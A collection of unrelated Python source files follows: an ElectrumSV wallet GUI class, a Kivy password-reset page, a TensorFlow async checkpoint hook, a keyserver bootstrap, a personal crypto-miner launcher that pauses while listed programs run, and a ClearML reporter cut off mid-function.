self.dark_icon = app_state.config.get("dark_icon", False)
self.tray = QSystemTrayIcon(self._tray_icon(), None)
self.tray.setToolTip('ElectrumSV')
self.tray.activated.connect(self._tray_activated)
self._build_tray_menu()
self.tray.show()
# FIXME Fix what.. what needs to be fixed here?
set_language(app_state.config.get('language', get_default_language()))
logs.add_handler(self.log_handler)
self._start()
def _start(self):
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.installEventFilter(OpenFileEventFilter(self.windows))
self.create_new_window_signal.connect(self.start_new_window)
self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
# Toggling of showing addresses in the fiat preferences.
self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
ColorScheme.update_from_widget(QWidget())
def _signal_all(self, method, *args):
for window in self.windows:
getattr(window, method)(*args)
def _close(self):
for window in self.windows:
window.close()
def close_window(self, window) -> None:
# NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
# a problem where it gets garbage collected before it's Qt5 `closeEvent` handling is
# completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
QTimer.singleShot(0, partial(self._close_window, window))
logger.debug("app.close_window.queued")
def _close_window(self, window):
logger.debug(f"app.close_window.executing {window!r}")
app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
self.windows.remove(window)
self.window_closed_signal.emit(window)
self._build_tray_menu()
if not self.windows:
self._last_window_closed()
def setup_app(self):
# app_state.daemon is initialised after app. Setup things dependent on daemon here.
pass
def _build_tray_menu(self):
# Avoid immediate GC of old menu when window closed via its action
if self.tray.contextMenu() is None:
m = QMenu()
self.tray.setContextMenu(m)
else:
m = self.tray.contextMenu()
m.clear()
for window in self.windows:
submenu = m.addMenu(window._wallet.name())
submenu.addAction(_("Show/Hide"), window.show_or_hide)
submenu.addAction(_("Close"), window.close)
m.addAction(_("Dark/Light"), self._toggle_tray_icon)
m.addSeparator()
m.addAction(_("Exit ElectrumSV"), self._close)
self.tray.setContextMenu(m)
def _tray_icon(self):
if self.dark_icon:
return read_QIcon('electrumsv_dark_icon.png')
else:
return read_QIcon('electrumsv_light_icon.png')
def _toggle_tray_icon(self) -> None:
self.dark_icon = not self.dark_icon
app_state.config.set_key("dark_icon", self.dark_icon, True)
self.tray.setIcon(self._tray_icon())
def _tray_activated(self, reason) -> None:
if reason == QSystemTrayIcon.DoubleClick:
if all([w.is_hidden() for w in self.windows]):
for w in self.windows:
w.bring_to_top()
else:
for w in self.windows:
w.hide()
def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
# Use a signal as can be called from daemon thread
self.create_new_window_signal.emit(path, uri)
def show_network_dialog(self, parent) -> None:
if not app_state.daemon.network:
parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'), title=_('Offline'))
return
if self.net_dialog:
self.net_dialog.on_update()
self.net_dialog.show()
self.net_dialog.raise_()
return
from . import network_dialog
# from importlib import reload
# reload(network_dialog)
self.net_dialog = network_dialog.NetworkDialog(app_state.daemon.network, app_state.config)
self.net_dialog.show()
def show_log_viewer(self) -> None:
if self.log_window is None:
self.log_window = SVLogWindow(None, self.log_handler)
self.log_window.show()
def _last_window_closed(self) -> None:
for dialog in (self.net_dialog, self.log_window):
if dialog:
dialog.accept()
def on_transaction_label_change(self, wallet: Wallet, tx_hash: bytes, text: str) -> None:
self.label_sync.set_transaction_label(wallet, tx_hash, text)
def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
self.label_sync.set_keyinstance_label(account, key_id, text)
def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
w = ElectrumWindow(wallet)
self.windows.append(w)
self._build_tray_menu()
self._register_wallet_events(wallet)
self.window_opened_signal.emit(w)
return w
def _register_wallet_events(self, wallet: Wallet) -> None:
wallet.contacts._on_contact_added = self._on_contact_added
wallet.contacts._on_contact_removed = self._on_contact_removed
wallet.contacts._on_identity_added = self._on_identity_added
wallet.contacts._on_identity_removed = self._on_identity_removed
def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_added_signal.emit(contact, identity)
def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_removed_signal.emit(contact, identity)
def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.contact_added_signal.emit(contact, identity)
def _on_contact_removed(self, contact: ContactEntry) -> None:
self.contact_removed_signal.emit(contact)
def on_new_wallet_event(self, wallet_path: str, row: WalletEventRow) -> None:
self.new_notification.emit(wallet_path, row)
def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
for w in self.windows:
if w._wallet.get_storage_path() == path:
return w
def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
for w in self.windows:
for account in w._wallet.get_accounts():
if account.get_id() == account_id:
return w
def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
is_startup: bool=False) -> Optional[ElectrumWindow]:
'''Raises the window for the wallet if it is open. Otherwise
opens the wallet and creates a new window for it.'''
for w in self.windows:
if w._wallet.get_storage_path() == wallet_path:
w.bring_to_top()
break
else:
wizard_window: Optional[WalletWizard] = None
if wallet_path is not None:
is_valid, was_aborted, wizard_window = WalletWizard.attempt_open(wallet_path)
if was_aborted:
return None
if not is_valid:
wallet_filename = os.path.basename(wallet_path)
MessageBox.show_error(
_("Unable to load file '{}'.").format(wallet_filename))
return None
else:
wizard_window = WalletWizard(is_startup=is_startup)
if wizard_window is not None:
result = wizard_window.run()
if result != QDialog.Accepted:
return None
wallet_path = wizard_window.get_wallet_path()
# We cannot rely on accept alone indicating success.
if wallet_path is None:
return None
wallet = app_state.daemon.load_wallet(wallet_path)
assert wallet is not None
w = self._create_window_for_wallet(wallet)
if uri:
w.pay_to_URI(uri)
w.bring_to_top()
w.setWindowState(w.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
# this will activate the window
w.activateWindow()
return w
def update_check(self) -> None:
if (not app_state.config.get('check_updates', True) or
app_state.config.get("offline", False)):
return
def f():
import requests
try:
response = requests.request(
'GET', "https://electrumsv.io/release.json",
headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
result = response.json()
self._on_update_check(True, result)
except Exception:
self._on_update_check(False, sys.exc_info())
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _on_update_check(self, success: bool, result: dict) -> None:
if success:
when_checked = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('last_update_check', result)
app_state.config.set_key('last_update_check_time', when_checked, True)
self.update_check_signal.emit(success, result)
def initial_dialogs(self) -> None:
'''Suppressible dialogs that are shown when first opening the app.'''
dialogs.show_named('welcome-ESV-1.3.7')
def event_loop_started(self) -> None:
self.cosigner_pool = CosignerPool()
self.label_sync = LabelSync()
if app_state.config.get("show_crash_reporter", default=True):
self.exception_hook = Exception_Hook(self)
self.timer.start()
signal.signal(signal.SIGINT, lambda *args: self.quit())
self.initial_dialogs()
path = app_state.config.get_cmdline_wallet_filepath()
if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
self.quit()
def run_app(self) -> None:
when_started = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
app_state.config.set_key('start_time', when_started, True)
self.update_check()
threading.current_thread().setName('GUI')
self.timer.setSingleShot(False)
self.timer.setInterval(500) # msec
self.timer.timeout.connect(app_state.device_manager.timeout_clients)
QTimer.singleShot(0, self.event_loop_started)
self.exec_()
logs.remove_handler(self.log_handler)
# Shut down the timer cleanly
self.timer.stop()
# clipboard persistence
# see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
event = QtCore.QEvent(QtCore.QEvent.Clipboard)
self.sendEvent(self.clipboard(), event)
self.tray.hide()
def run_coro(self, coro, *args, on_done=None):
'''Run a coroutine. on_done, if given, is passed the future containing the reuslt or
exception, and is guaranteed to be called in the context of the GUI thread.
'''
def task_done(future):
self.async_tasks_done.emit()
future = app_state.async_.spawn(coro, *args, on_done=on_done)
future.add_done_callback(task_done)
return future
def run_in_thread(self, func, *args,
on_done: Optional[Callable[[concurrent.futures.Future], None]]=None):
'''Run func(*args) in a thread. on_done, if given, is passed the future containing the
reuslt or exception, and is guaranteed to be called in the context of the GUI
thread.
'''
return self.run_coro(run_in_thread, func, *args, on_done=on_done)
|
appReset.py
|
"""
appReset
========
`appReset` is a toolbox for main app, it contains necessary methods that AppReset page requires.
"""
import threading
from functools import partial
from kivy.clock import mainthread
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.popup import Popup
from kivy.uix.textinput import TextInput
from func import image_button, text_button, database_api
from func.garden.progressspinner import ProgressSpinner
__author__ = "Muhammed Yasin Yildirim"
def on_pre_enter(self):
"""
This method adds image button to quit and text button to go back.
:param self: It is for handling class structure.
:return:
"""
self.ids["layout_menubar"].add_widget(image_button.add_button("data/img/ico_quit.png",
"data/img/ico_quit_select.png",
.075,
{"x": .925, "y": 0},
self.on_quit
)
)
self.add_widget(text_button.add_button("< Back",
"data/font/CaviarDreams.ttf",
(.3, .025),
{"center_x": .5, "y": .175},
self.on_back
)
)
def on_reset(s):
"""
This method creates threading to handle reset process in background.
:param s: It is for handling class structure.
:return:
"""
def on_reset_confirm(self, dt):
"""
This method asks user to provide key sent to his or her e-mail for resetting password.
:param self: It is for handling class structure.
:param dt: It is for handling callback input.
:return:
"""
self.ico_status_confirm.opacity = 0
if not (self.input_key.text.strip() or self.input_new_password.text.strip()):
self.ico_status_confirm.opacity = 1
else:
is_ok = database_api.resetPassword(self.ids["input_username"].text,
self.input_key.text,
self.input_new_password.text
)
if not isinstance(is_ok, str):
self.popup.dismiss()
self.on_back()
else:
self.ico_status_confirm.opacity = 1
@mainthread
def authorize(self=s):
"""
This method checks if user credentials are valid through server and creates confirmation pop-up accordingly.
:return: It is for terminating thread.
"""
btn_reset = self.ids["btn_reset"]
btn_reset.disabled = True
ico_status = self.ids["ico_status"]
ico_spinner = ProgressSpinner(size_hint=(.05, .05),
pos_hint={"center_x": .65, "center_y": .8}
)
self.add_widget(ico_spinner)
input_username = self.ids["input_username"].text
# input_email = self.ids["input_email"].text
if not input_username.strip(): # or input_email.strip()
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_warning.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
else:
try:
data = database_api.resetPassword(self.ids["input_username"].text)
except:
data = None
if data is not None:
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_success.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
popup_content = FloatLayout()
self.popup = Popup(title="Reset Password",
content=popup_content,
separator_color=[140 / 255., 55 / 255., 95 / 255., 1.],
size_hint=(None, None),
size=(self.width / 3, self.height / 3)
)
self.input_key = TextInput(hint_text="Confirmation Key",
write_tab=False,
multiline=False,
font_name="data/font/CaviarDreams_Bold.ttf",
font_size=self.height / 36,
background_normal="data/img/widget_gray_75.png",
background_active="data/img/widget_purple_75_select.png",
background_disabled_normal="data/img/widget_black_75.png",
padding_y=[self.height / 36, 0],
size_hint=(.9, .3),
pos_hint={"center_x": .5, "center_y": .8}
)
popup_content.add_widget(self.input_key)
self.input_new_password = TextInput(hint_text="New Password",
write_tab=False,
multiline=False,
password=True,
font_name="data/font/CaviarDreams_Bold.ttf",
font_size=self.height / 36,
background_normal="data/img/widget_gray_75.png",
background_active="data/img/widget_purple_75_select.png",
background_disabled_normal="data/img/widget_black_75.png",
padding_y=[self.height / 36, 0],
size_hint=(.9, .3),
pos_hint={"center_x": .5, "center_y": .4}
)
popup_content.add_widget(self.input_new_password)
self.ico_status_confirm = Image(source="data/img/ico_status_warning.png",
allow_stretch=True,
opacity=0,
size_hint=(.15, .15),
pos_hint={"center_x": .9, "center_y": .8}
)
popup_content.add_widget(self.ico_status_confirm)
popup_content.add_widget(Button(text="Submit",
font_name="data/font/LibelSuit.ttf",
font_size=self.height / 40,
background_normal="data/img/widget_green.png",
background_down="data/img/widget_green_select.png",
size_hint_x=.5,
size_hint_y=None,
height=self.height / 20,
pos_hint={"center_x": .25, "y": .0},
on_release=partial(on_reset_confirm,
s
)
)
)
popup_content.add_widget(Button(text="Cancel",
font_name="data/font/LibelSuit.ttf",
font_size=self.height / 40,
background_normal="data/img/widget_red.png",
background_down="data/img/widget_red_select.png",
size_hint_x=.5,
size_hint_y=None,
height=self.height / 20,
pos_hint={"center_x": .75, "y": .0},
on_release=self.popup.dismiss)
)
self.popup.open()
else:
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_fail.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
return
authorization = threading.Thread(target=authorize)
authorization.daemon = True
authorization.start()
def on_back(pages, screen):
"""
This method switches current screen to specified one.
:param pages: It is list of pages.
:param screen: It is screen manager.
:return:
"""
try:
screen.switch_to(pages[2])
except:
screen.current = pages[2].name
finally:
del pages[1]
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
self._last_checkpoint_step = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
# We cannot do this in begin, since we let other hooks to change graph and
# add variables in begin. Graph is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
if self._last_checkpoint_step != last_step:
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
self._last_checkpoint_step = step
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._last_checkpoint_step = step
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
|
server.py
|
__author__ = "Thomas Spycher, Philipp Spinnler"
__copyright__ = "Copyright 2013, Zerodine GmbH (zerodine.com) "
__credits__ = ["Thomas Spycher", "Philipp Spinnler"]
__license__ = "Apache-2.0"
__maintainer__ = "Thomas Spycher"
__email__ = "me@tspycher.com"
__status__ = "Development"
import sys, os
import threading
import logging
try:
import tornado.ioloop
import tornado.web
except ImportError:
sys.stderr.write("Looks like you have tornado not installed. (apt-get install python-tornado)")
sys.exit(1)
from krypton.hkpserver.libs.gossip import Gossiping
from controllers import *
hkpplus = False
try:
from krypton.hkpplus.controllers.apicontroller import ApiController
hkpplus = True
except ImportError as e:
if not "apicontroller" in str(e).lower():
raise e
class Server(object):
"""
"""
controllers = ['Lookup', 'Add', 'Index', 'Recon']
routes = []
routePrefix = None
applicationContext = None
logger = logging.getLogger("krypton")
gossiping = None
def __init__(self, routePrefix="/pks", applicationContext=None):
"""
:param routePrefix:
:param config:
"""
self.routePrefix = routePrefix
self.applicationContext = applicationContext
self.gossiping = Gossiping(applicationContext=self.applicationContext)
if hkpplus:
self.controllers.append('Api')
logging.getLogger("krypton.bootstrap").info("Kryptonplus IS available, running enterprise version")
else:
logging.getLogger("krypton.bootstrap").info("Kryptonplus is NOT available, running community version")
def _buildRoutes(self):
"""
"""
print os.path.join(self.applicationContext.basePath, "../doc/html")
staticPre = [
(r'/doc/(.*)', tornado.web.StaticFileHandler,
{'path': os.path.join(self.applicationContext.basePath, "doc/html")})
]
staticPost = [
(r'/(.*)', tornado.web.StaticFileHandler,
{'path': os.path.join(self.applicationContext.basePath, "hkpserver/wwwroot")})
]
for s in staticPre:
self.routes.append(s)
for c in self.controllers:
self.routes.append(eval("%sController" % c).routes(
prefix=self.routePrefix,
applicationContext=self.applicationContext))
for s in staticPost:
self.routes.append(s)
def start(self, port=11371, as_thread=False):
"""
:param port:
:param as_thread:
:return:
"""
self._buildRoutes()
application = tornado.web.Application(self.routes)
application.listen(port)
self.logger.info("Server will liston on Port: %i" % port)
self.gossiping.start()
if as_thread:
threading.Thread(target=self._start).start()
return True
else:
self._start()
def _start(self):
"""
"""
tornado.ioloop.IOLoop.instance().start()
def stop(self):
"""
"""
tornado.ioloop.IOLoop.instance().stop()
self.gossiping.stop()
|
app.py
|
import os
import pathlib
import signal
import subprocess
import sys
import threading
import time
from os import sep
from pathlib import Path
from typing import Tuple, Union
import pandas as pd
import psutil
DIRPATH = Path("D:\Mining\lolMiner")
FILEPATH = Path("lolMiner.exe")
ARGS = ("--algo", "ETCHASH", "--pool", "eu1-etc.ethermine.org:4444", "--user", "0x1e3543b1845c418668cE20FE2eaB28484A6B8d1B.PC-Miner")
LISTFILE = pathlib.Path("ProgramList.txt")
class App:
__alive: bool
__sleep_time: int
alive = property(lambda self: self.__alive)
def __init__(self):
signal.signal(signal.SIGINT, lambda sig, frame: self.signalHandler())
self.__listupdater = ProgramListUpdater(LISTFILE)
self.__process_searcher = ProcessSearcher(
FileLoader.loadFile(LISTFILE))
self.__miner = Miner(executable=DIRPATH / FILEPATH, args=ARGS)
self.__thread_checker = threading.Thread(target=self.checker)
self.__alive = False
self.__sleep_time = 1
def signalHandler(self):
self.stop()
print('Exiting!')
sys.exit(0)
def start(self):
self.__alive = True
self.__thread_checker.start()
while self.alive:
time.sleep(0.5)
# signal.pause()
def checker(self):
while self.__alive:
# updates list of programs
self.__process_searcher.process_list = self.__listupdater.programs
if(self.__miner.alive and self.__process_searcher.searchInList()):
self.__miner.stop()
print("Miner Stopped!")
elif(not self.__miner.alive and not self.__process_searcher.searchInList()):
print("Miner Started!")
self.__miner.start()
time.sleep(self.__sleep_time)
self.__miner.stop()
def stop(self):
self.__alive = False
self.__miner.stop()
class FileLoader:
def loadFile(file: str) -> list[str]:
return set(pd.read_csv(file, header=None).values.flat)
class ProgramListUpdater():
_lastupdate: float = 0
_programs: set[str]
last_update = property(lambda self: time.ctime(self._lastupdate))
programs = property(lambda self: self._getList())
def __init__(self, file: str):
self.__file = file
def _update(self):
# time.ctime(os.stat(self.__file)[os.stat.ST_MTIME])
result, last_mtime = self.isChanged()
if result:
self._lastupdate = last_mtime
self._programs = FileLoader.loadFile(self.__file)
def _getList(self):
if self.isChanged():
self._update()
return self._programs
def isChanged(self):
mtime = os.stat(self.__file).st_mtime
return self._lastupdate != mtime, mtime
class ProcessSearcher:
_process_list: set[str]
process_list = property(lambda self: self._process_list,
fset=lambda self, value: self.__listToSet(value))
def __init__(self, process_list: Union[list, set, str] = []):
self._process_list = self.__listToSet(process_list)
def __listToSet(self, process_list):
return {proc.lower() for proc in process_list}
def searchInList(self) -> bool:
return any(
p.name().lower() in self._process_list for p in psutil.process_iter()
)
class Miner:
__filepath: str
__args: list[str]
__process: subprocess.Popen = None
__return_code: int
executable = property(lambda self: self.__filepath)
args = property(lambda self: self.__args)
alive = property(lambda self: self.isAlive())
def __init__(self, args:Union[list[str],Tuple], executable: Union[str,Path]=None):
"""Miner constructor.
Args:
args (Union[list[str],Tuple]): List of arguments to pass at the Miner
executable (Union[str,Path], optional): Executable to use for the miner, if None it will use the first element of args. Defaults to None.
Raises:
ValueError: if args and executable are not set.
"""
if not args and not executable:
raise ValueError()
args = list(args)
executable = args.pop(0) if not executable else str(executable)
self.__filepath, self.__args = executable, args
def __cmd(self):
return [self.__filepath] + self.__args
def start(self):
self.__process = subprocess.Popen(args=self.__cmd(), stdin=subprocess.DEVNULL)
def stop(self):
if self.alive:
self.__process.terminate()
def kill(self):
if self.alive:
self.__process.kill()
def isAlive(self) -> bool:
if self.__process is None:
return False
if not self.getReturnCode():
return True
return False
def getReturnCode(self):
if self.__process is None:
return None
self.__return_code = self.__process.poll()
return self.__return_code
if __name__ == "__main__":
app = App()
app.start()
|
reporter.py
|
import json
import math
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
import numpy as np
from threading import Thread, Event
from ..base import InterfaceBase
from ..setupuploadmixin import SetupUploadMixin
from ...utilities.async_manager import AsyncManagerMixin
from ...utilities.plotly_reporter import create_2d_histogram_plot, create_value_matrix, create_3d_surface, \
create_2d_scatter_series, create_3d_scatter_series, create_line_plot, plotly_scatter3d_layout_dict, \
create_image_plot, create_plotly_table
from ...utilities.py3_interop import AbstractContextManager
from .events import ScalarEvent, VectorEvent, ImageEvent, PlotEvent, ImageEventNoUpload, UploadEvent, MediaEvent
from ...config import config
class Reporter(InterfaceBase, AbstractContextManager, SetupUploadMixin, AsyncManagerMixin):
"""
A simple metrics reporter class.
This class caches reports and supports both a explicit flushing and context-based flushing. To ensure reports are
sent to the backend, please use (assuming an instance of Reporter named 'reporter'):
- use the context manager feature (which will automatically flush when exiting the context):
with reporter:
reporter.report...
...
- explicitly call flush:
reporter.report...
...
reporter.flush()
"""
def __init__(self, metrics, flush_threshold=10, async_enable=False):
"""
Create a reporter
:param metrics: A Metrics manager instance that handles actual reporting, uploads etc.
:type metrics: .backend_interface.metrics.Metrics
:param flush_threshold: Events flush threshold. This determines the threshold over which cached reported events
are flushed and sent to the backend.
:type flush_threshold: int
"""
log = metrics.log.getChild('reporter')
log.setLevel(log.level)
super(Reporter, self).__init__(session=metrics.session, log=log)
self._metrics = metrics
self._flush_threshold = flush_threshold
self._events = []
self._bucket_config = None
self._storage_uri = None
self._async_enable = async_enable
self._flush_frequency = 30.0
self._exit_flag = False
self._flush_event = Event()
self._flush_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
self._max_iteration = 0
def _set_storage_uri(self, value):
value = '/'.join(x for x in (value.rstrip('/'), self._metrics.storage_key_prefix) if x)
self._storage_uri = value
storage_uri = property(None, _set_storage_uri)
max_float_num_digits = config.get('metrics.plot_max_num_digits', None)
@property
def flush_threshold(self):
return self._flush_threshold
@flush_threshold.setter
def flush_threshold(self, value):
self._flush_threshold = max(0, value)
@property
def async_enable(self):
return self._async_enable
@async_enable.setter
def async_enable(self, value):
self._async_enable = bool(value)
@property
def max_iteration(self):
return self._max_iteration
def _daemon(self):
while not self._exit_flag:
self._flush_event.wait(self._flush_frequency)
self._flush_event.clear()
self._write()
# wait for all reports
if self.get_num_results() > 0:
self.wait_for_results()
# make sure we flushed everything
self._async_enable = False
self._write()
if self.get_num_results() > 0:
self.wait_for_results()
def _report(self, ev):
ev_iteration = ev.get_iteration()
if ev_iteration is not None:
# we have to manually add get_iteration_offset() because event hasn't reached the Metric manager
self._max_iteration = max(self._max_iteration, ev_iteration + self._metrics.get_iteration_offset())
self._events.append(ev)
if len(self._events) >= self._flush_threshold:
self.flush()
def _write(self):
if not self._events:
return
# print('reporting %d events' % len(self._events))
res = self._metrics.write_events(self._events, async_enable=self._async_enable, storage_uri=self._storage_uri)
if self._async_enable:
self._add_async_result(res)
self._events = []
def flush(self):
"""
Flush cached reports to backend.
"""
self._flush_event.set()
def stop(self):
self._exit_flag = True
self._flush_event.set()
self._thread.join()
def report_scalar(self, title, series, value, iter):
"""
Report a scalar value
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param value: Reported value
:type value: float
:param iter: Iteration number
:type value: int
"""
ev = ScalarEvent(metric=self._normalize_name(title), variant=self._normalize_name(series), value=value,
iter=iter)
self._report(ev)
def report_vector(self, title, series, values, iter):
"""
Report a vector of values
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param values: Reported values
:type value: [float]
:param iter: Iteration number
:type value: int
"""
if not isinstance(values, Iterable):
raise ValueError('values: expected an iterable')
ev = VectorEvent(metric=self._normalize_name(title), variant=self._normalize_name(series), values=values,
iter=iter)
self._report(ev)
def report_plot(self, title, series, plot, iter, round_digits=None):
"""
Report a Plotly chart
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param plot: A JSON describing a plotly chart (see https://help.plot.ly/json-chart-schema/)
:type plot: str or dict
:param iter: Iteration number
:param round_digits: number of digits after the dot to leave
:type value: int
"""
def floatstr(o):
if o != o:
return 'nan'
elif o == math.inf:
return 'inf'
elif o == -math.inf:
return '-inf'
return round(o, ndigits=round_digits) if round_digits is not None else o
# noinspection PyBroadException
try:
# Special json encoder for numpy types
def default(obj):
if isinstance(obj, (np.integer, np.int64)):
return int(obj)
elif isinstance(obj, np.floating):
return float(round(obj, ndigits=round_digits) if round_digits is not None else obj)
elif isinstance(obj, np.ndarray):
return obj.round(round_digits).tolist() if round_digits is not None else obj.tolist()
except Exception:
default = None
if round_digits is None:
round_digits = self.max_float_num_digits
if round_digits is False:
round_digits = None
if isinstance(plot, dict):
if 'data' in plot:
for d in plot['data']:
if not isinstance(d, dict):
continue
for k, v in d.items():
if isinstance(v, list):
d[k] = list(floatstr(s) if isinstance(s, float) else s for s in v)
elif isinstance(v, tuple):
d[k] = tuple(floatstr(s) if isinstance(s, float) else s for s in v)
elif isinstance(v, float):
